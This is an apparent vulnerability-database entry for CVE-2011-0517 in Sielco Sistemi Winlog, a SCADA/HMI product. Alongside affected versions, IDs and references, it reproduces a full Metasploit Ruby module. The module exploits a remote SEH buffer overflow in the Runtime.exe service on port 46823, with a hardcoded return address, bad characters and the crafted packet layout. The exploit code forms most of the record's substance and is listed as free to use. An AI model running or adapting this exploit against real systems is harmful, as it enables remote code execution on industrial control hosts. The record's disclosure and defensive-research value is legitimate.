ID
VAR-E-201101-0440
CVE
cve_id: | CVE-2011-0517 | Trust: 2.4 |
EDB ID
17430
TITLE
Sielco Sistemi Winlog - Remote Buffer Overflow (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Sielco Sistemi Winlog - Remote Buffer Overflow (Metasploit). CVE-2011-0517, CVE-70418. Remote exploit for Windows platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | sielco | model: | sistemi winlog | scope: | - | version: | - | Trust: 1.5 |
vendor: | sielco | model: | sistemi winlog pro | scope: | eq | version: | 2.7 | Trust: 0.3 |
vendor: | sielco | model: | sistemi winlog pro | scope: | ne | version: | 2.7.1 | Trust: 0.3 |
EXPLOIT
##
# $Id: winlog_runtime.rb 13000 2011-06-21 22:42:53Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Sielco Sistemi Winlog Buffer Overflow',
      'Description' => %q{
          This module exploits a buffer overflow in Sielco
        Sistemi Winlog <= 2.07.00. When sending a specially formatted
        packet to the Runtime.exe service, an attacker may be able to
        execute arbitrary code.
      },
      'Author' => [ 'Luigi Auriemma', 'MC' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 13000 $',
      'References' =>
        [
          [ 'CVE', '2011-0517' ],
          [ 'OSVDB', '70418'],
          [ 'URL', 'http://aluigi.org/adv/winlog_1-adv.txt' ],
        ],
      'Privileged' => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload' =>
        {
          'Space' => 450,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Winlog Lite 2.07.00', { 'Ret' => 0x011946de } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jan 13 2011'))
    register_options([Opt::RPORT(46823)], self.class)
  end
  def exploit
    connect
    data = [0x02].pack('C') # opcode
    data << [0x0101].pack('n')
    data << rand_text_alpha_upper(588)
    data << generate_seh_payload(target.ret)
    print_status("Trying target #{target.name}...")
    sock.put(data)
    handler
    disconnect
  end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Buffer Overflow (Metasploit)
Trust: 1.0
TAGS
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | exploit | Trust: 0.5 |
tag: | overflow | Trust: 0.5 |
tag: | arbitrary | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2011-0517 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 17430 | Trust: 1.6 |
db: | EDBNET | id: | 40020 | Trust: 0.6 |
db: | PACKETSTORM | id: | 102516 | Trust: 0.5 |
db: | BID | id: | 45813 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2011-0517 | Trust: 2.1 |
url: | https://www.exploit-db.com/exploits/17430/ | Trust: 0.6 |
url: | http://www.sielcosistemi.com/en/products/winlog_scada_hmi/ | Trust: 0.3 |
url: | http://aluigi.altervista.org/adv/winlog_1-adv.txt | Trust: 0.3 |
SOURCES
db: | BID | id: | 45813 |
db: | PACKETSTORM | id: | 102516 |
db: | EXPLOIT-DB | id: | 17430 |
db: | EDBNET | id: | 40020 |
LAST UPDATE DATE
2022-07-27T09:33:16.024000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 45813 | date: | 2015-03-19T09:45:00 |
SOURCES RELEASE DATE
db: | BID | id: | 45813 | date: | 2011-01-14T00:00:00 |
db: | PACKETSTORM | id: | 102516 | date: | 2011-06-23T06:27:04 |
db: | EXPLOIT-DB | id: | 17430 | date: | 2011-06-21T00:00:00 |
db: | EDBNET | id: | 40020 | date: | 2011-06-21T00:00:00 |